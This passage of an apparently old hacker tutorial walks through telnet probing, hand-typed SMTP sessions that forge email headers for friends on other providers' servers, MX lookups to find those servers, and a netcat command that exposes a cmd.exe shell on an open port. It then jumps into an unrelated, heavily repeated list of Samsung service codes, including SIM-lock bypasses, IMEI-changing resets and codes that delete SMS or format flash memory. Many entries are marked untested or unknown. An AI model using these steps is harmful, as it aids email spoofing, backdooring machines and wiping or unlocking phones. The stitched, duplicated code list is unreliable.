easy to understand, like keyboard, monitor, printer and modem. Other ports are
virtual, meaning that they are created by software. When that modem port of
yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has
the ability to open or close any of over 65,000 different virtual ports, and has
the ability to connect to any of these on another computer - if it is running
that port, and if a firewall doesn?t block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two
ways: by number or by name.
****************

The simplest use of telnet is to log into a remote computer. Give the command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to
telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may get the
message:

login:

Type your user name here, making sure to be exact. You can't swap between lower
case and capital letters. For example, user name Guest is not the same as guest.

****************
Newbie note: Lots of people email me asking how to learn what their user name
and password are. Stop laughing, darn it, they really do. If you don't know your
user name and password, that means whoever runs that computer didn't give you an
account and doesn't want you to log on.
****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is usually
because they try to telnet into a computer, or a port on a computer that is set
up to refuse telnet connections. Here's what it might look like when a computer
refuses a telnet connection:

C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A
connection attempt failed because the connected party did not properly respond
after a period of time, or established connection failed because connected host
has failed to respond.

Or you might see:

C:\ >telnet hotmail.com
Connecting To hotmail.com...Could not open connection to the host, on port
23. No connection could be made because the target machine actively refused it.

If you just give the telnet command without giving a port number, it will
automatically try to connect on port 23, which sometimes runs a telnet server.

**************
Newbie note: your Windows computer has a telnet client program, meaning it will
let you telnet out of it. However you have to install a telnet server before
anyone can telnet into port 23 on your computer.
*************

If telnet failed to connect, possibly the computer you were trying to telnet
into was down or just plain no longer in existence. Maybe the people who run
that computer don't want you to telnet into it.

Even though you can't telnet into an account inside some computer, often you can
get some information back or get that computer to do something interesting for
you. Yes, you can get a telnet connection to succeed -without doing anything
illegal --against almost any computer, even if you don't have permission to log
in. There are many legal things you can do to many randomly chosen computers
with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables
encrypted connections between computers. If you want to SSH into an account
there, you can get a shell account for free at http://freeshell.org . You can
get a free SSH client program from http://winfiles.com .

***************
You can get punched in the nose warning: Your online provider might kick you off
for making telnet probes of other computers. The solution is to get a local
online provider and make friends with the people who run it, and convince them
you are just doing harmless, legal explorations.
*************

Sometimes a port is running an interesting program, but a firewall won't let you
in. For example, 10.0.0.3, a computer on my local area network, runs an email
sending program, (sendmail working together with Postfix, and using Kmail to
compose emails). I can use it from an account inside 10.0.0.3 to send emails
with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer, here's what
happens:

C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No
connection could be made because the target machine actively refused it.

However, if I log into an account on 10.0.0.3 and then telnet from inside to
port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning
localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep people from
using it to try to break in or to forge email. Now the ubergeniuses reading this
will start to make fun of me because no Internet address that begins with 10. is
reachable from the Internet. However, sometimes I place this "test-box" computer
online with a static Internet address, meaning whenever it is on the Internet,
it always has the same numerical address. I'm not going to tell you what its
Internet address is because I don't want anyone messing with it. I just want to
mess with other people's computers with it, muhahaha. That's also why I always
keep my Internet address from showing up in the headers of my emails.

***************
Newbie note: What is all this about headers? It's stuff at the beginning of an
email that may - or may not - tell you a lot about where it came from and when.
To see full headers, in Outlook click view -> full headers. In Eudora, click the
"Blah blah blah" icon.
****************

Want a computer you can telnet into and mess around with, and not get into
trouble no matter what you do to it? I've set up my techbroker.com
(206.61.52.33) with user xyz, password guest for you to play with. Here's how to
forge email to xyz@techbroker.com using telnet. Start with the command:

C:\>telnet techbroker.com 25
Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com
Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:
data
354 Start main input; end with .


just means hit return. In case you can't see that little
period between the s, what you do to end composing your email is to hit
enter, type a period, then hit enter again. Anyhow, try typing:

This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we
just composed looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date. However, you can
make your headers better by using a trick with the data command. After you give
it, you can insert as many headers as you choose. The trick is easier to show
than explain:

220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:cmeinel@techbroker.com
250 Requested mail action okay, completed
data
354 Start main input; end with .
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word followed
by a colon, and the a line followed by "return". As soon as you write a line
that doesn't begin this way, the rest of what you type goes into the body of the
email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up
in the header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation. Your email
has to go to someone at techbroker.com. If you can find any way to send email to
someone outside techbroker, let us know, because you will have broken our
security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:
user xyz
+OK user is known

Then type in this:
pass test
+OK mail drop has 2 message(s)

retr 1
+OK message follows
This is a test.

If you want to know all possible commands, give this command:

help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Unless you use a weird online provider like AOL, you can use these same tricks
to send and receive your own email. Or you can forge email to a friend by
telnetting to his or her online provider's email sending computer(s).

With most online providers you need to get the exact name of their email
computer(s). Often it is simply mail.targetcomputer.com (substitute the name of
the online provider for targetcomputer). If this doesn't work, you can find out
the name of their email server with the DOS nslookup program, which only runs
from cmd.exe. Here's an example:


C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

> set q=mx
> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>

The lines that tell you what computers will let you forge email to people with
@dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger =
mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they
would like you to use that address for email.If that lowest number server is too
busy, then try another server.

Sometimes when you ask about a mail server, nslookup will give you this kind of
error message:

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what are the domain servers for
your target online provider. A good place to start looking is
http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see
http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers
for any Internet address.

****************
Newbie note: A domain name server provides information on the names and numbers
assigned to computers on the Internet. For example, dns1.wurld.net and
dns2.wurld.net contain information on happyhacker.org, techbroker.com,
securitynewsportal.com, thirdpig.com and sage-inc.com. When you query
dns1.wurld.net about other computers, it might have to go hunting for that
information from other name servers. That's why you might get a timed out
failure.
***************

Once you know the domain servers for an online service, set one of them for the
server for your nslookup program. Here's how you do it:

C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

Now give the command:

> server 207.217.126.41
Default Server: ns1.earthlink.net
Address: 207.217.126.41

Next command should be:
> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>

Your own online service will usually not mind and may even be glad if you use
telnet to read your email. Sometimes a malicious person or faulty email program
will send you a message that is so screwed up that your email program can't
download it. With telnet you can manually delete the bad email. Otherwise tech
support has to do it for you.

If you think about it, this ability to forge email is a huge temptation to
spammers. How can your online provider keep the bad guys from filling up a
victim's email box with garbage? The first time a bad guy tries this, probably
nothing will stop him or her. The second time the online provider might block
the bad guy at the firewall, maybe call the bad guy's online provider and kick
him or her and maybe get the bad guy busted or sued.

**************
You can go to jail warning: Sending hundreds or thousands of junk emails to bomb
someone's email account is a felony in the US.
***************

***************
You can get sued warning: Spamming, where you send only one email to each
person, but send thousands or millions of emails, is borderline legal. However,
spammers have been successfully sued when they forge the email addresses of
innocent people as senders of their spam.
****************

Now that you know how to read and write email with telnet, you definitely have
something you can use to show off with. Happy hacking!

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a
free program written by Weld Pond and Hobbit, and available from many sites, for
example
http://www.atstake.com/research/tools/#network_utilities . It is basically
telnet on steroids. For example, using netcat, you can set up a port on your
Windows computer to allow people to telnet into a DOS shell by using this
command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't
conflict with another port by checking with the netstat command. Then you and
your friends, enemies and random losers can either telnet in or netcat in with
the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you
set up a sniffer to keep track of the action, you can turn this scary back door
into a fascinating honeypot. For example, you could run it on port 23 and watch
all the hackers who attack with telnet hoping to log in. With some programming
you could even fake a unix-like login sequence and play some tricks on your
attackers.

Exclusive Stuff : Samsung Mobile

*#06# -> Show IMEI

*#9999# -> Show Software Version

*#0837# -> Show Software Version (instructions)

*#0001# -> Show Serial Parameters

*#9125# -> Activates the smiley when charging.

*#9998*228# -> Battery status (capacity, voltage, temperature)

*#9998*246# -> Program status

*#9998*289# -> Change Alarm Buzzer Frequenc

y
*#9998*324# -> Debug screens

*#9998*364# -> Watchdog

*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.

*#9998*427# -> Trace Watchdog

*#9998*523# -> Change LCD contrast - Only with version G60RL01W

*#9998*544# -> Jig detect

*#9998*636# -> Memory status

*#9998*746# -> SIM File Size

*#9998*778# -> SIM Service Table

*#9998*785# -> RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error. *#9998*786# -> Run, Last UP, Last DOWN

*#9998*837# -> Software Version

*#9998*842# -> Test Vibrator - Flash the screenligth during 10 seconds and vibration activated.

*#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected

*#9998*872# -> Diag

*#9998*947# -> Reset On Fatal Error

*#9998*999# -> Last/Chk

*#9998*9266# -> Yann debug screen (=Debug Screens?)

*#9998*9999# -> Software version

*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown

SP-unlock SGH-600 and SGH 2100

*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset )

But also changes IMEI to 447967-89-400044-0, To restore your old IMEI use the IMEI program found on the software page.

*2767*2878# -> Custom EEEPROM Reset ( does not change the securitu CODE )

LAtest


*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together

*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error Menu
*#8999*327# EEP Menu
*#8999*3825523# Don't Know.
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version

#*4773# Incremental Redundancy
#*7752# 8 PSK uplink capability bit
#*7785# Reset wakeup & RTK timer cariables/variables
#*1200# ????
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*#8999*324# ??
#*7828# Task screen
#*5111# ??
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen
#*3849# Restarts Phone
#*3851# Restarts Phone
#*3876# Restarts Phone
#*7222# Operation Typ: (Class C GSM)
#*7224# !!! ERROR !!!
#*7252# Operation Typ: (Class B GPRS)
#*7271# CMD: (Not Available)
#*7274# CMD: (Not Available)
#*7337# Restarts Phone (Resets Wap Settings)
#*2787# CRTP ON/OFF
#*2886# AutoAnswer ON/OFF
#*3737# L1 AFC
#*5133# L1 HO Data
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*7284# L1 HO Data
#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*4700# Please use function 2637
#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
#*2558# Time ON
#*3370# Same as 4700
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5187# L1C2G trace Activate/Deactivate
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
#*2337# Permanent Registration Beep
#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*5171# L1P1
#*5172# L1P2
#*5173# L1P3
#*7326# Accessory
#*7683# Sleep variable
#*8465# Time in L1
#*2252# Current CAL
#*2836# AVDDSS Management Activate/Deactivate
#*3877# Dump of SPY trace
#*7728# RSAV
#*2677# Same as 4700
#*3797# Blinks 3D030300 in RED
#*3728# Time 2 Decod
#*3725# B4 last off
#*7372# Resetting the time to DPB variables
#*7732# Packet flow context bit Activate/Deactivate
#*6833# New uplink establishment Activate/Deactivate
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*4472# Hysteresis of serving cell: 3 dB
#*2775# Switch to 2 inner speaker
#*9270# Force WBS
#*7878# FirstStartup (0=NO, 1=YES)
#*3757# DSL UART speed set to (LOW, HIGH)
#*8726# Switches USBACM to Normal
#*8724# Switches USBACM to Generator mode
#*8727# Switches USBACM to Slink mode
#*8725# Switches USBACM to Loop-back mode
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*2872# CNT
*#8999*283# ???
#*22679# AMR Get Time
*288666# ???
*2886633# ???
*#8999*364# Watchdog ON/OFF
#*8370# Tfs4.0 Test 0
#*8371# Tfs4.0 Test 1
#*8372# Tfs4.0 Test 2
#*8373# Tfs4.0 Test 3
#*8374# Tfs4.0 Test 4
#*8375# Tfs4.0 Test 5
#*8376# Tfs4.0 Test 6
#*8377# Tfs4.0 Test 7
#*8378# Tfs4.0 Test 8
#*8379# Tfs4.0 Test 9
#837837# error=...

#*36245# Turns Email TestMenu on.

*2767*22236245# Email EPP set (....)!
*2767*837836245# Email Test Account!
*2767*29536245# Email Test2 Account!
*2767*036245# Email EPP reset!
*2767*136245# Email EPP set (1)!
*2767*736245# Email EPP set (7)!
*2767*3036245# Email...
*2767*3136245# Email...
*2767*3336245# Email...
*2767*3436245# Email...
*2767*3936245# Email...
*2767*4136245# Email...
*2767*4336245# Email...
*2767*4436245# Email...
*2767*4536245# Email...
*2767*4636245# Email...
*2767*4936245# Email...
*2767*6036245# Email...
*2767*6136245# Email...
*2767*6236245# Email...
*2767*6336245# Email...
*2767*6536245# Email...
*2767*6636245# Email...
*2767*8636245# Email...
*2767*85236245# Email...

*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings

*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF


**********************

#*7878# FirstStartup (0=NO, 1=YES)
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*22679# AMR Get Time
*#8999*364# Watchdog ON/OFF
*#8999*427# WATCHDOG signal route setup
*2767*3855# = Full Reset (Caution every stored data will be deleted.)
*2767*2878# = Custom Reset
*2767*927# = Wap Reset
*2767*226372# = Camera Reset (deletes photos)
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
Samsung Secret Codes Part 3
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the phone lock status
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF

Type *#9998*627837793# Go to the 'my parameters' and there you will find new menu where you can unlock phone.(not tested-for samsung C100)
To unlock a Samsung turn the phone off take the sim card and type the following code *#pw+15853649247w# .

Java status code: #*53696# (Samsung X600)

If you want to unlock your phone put a sim from another company then type *#9998*3323# it will reset your phone. Push exit and then push 7, it will reset again. Put your other sim in and it will say sim lock, type in 00000000 then it should be unlocked. Type in *0141# then the green call batton and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a sim in it by typing *#2767*2878# or *#9998*3855# (not tested)



*2767*688# = Unlocking Code
*#8999*8378# = All in one Code
*#4777*8665# = GPSR Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}][/b]
*#2255# = Call List

#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code

#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI

#*2562# = ??? White for 15 secs than restarts.
#*2565# = Check Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts.
#*3851# = ??? White for 15 secs than restarts.
#*3876# = ??? White for 15 secs than restarts.

#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets WAP Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*3676# = Flash volume formated
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn't work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing

*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock


#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF

*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P WAP Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
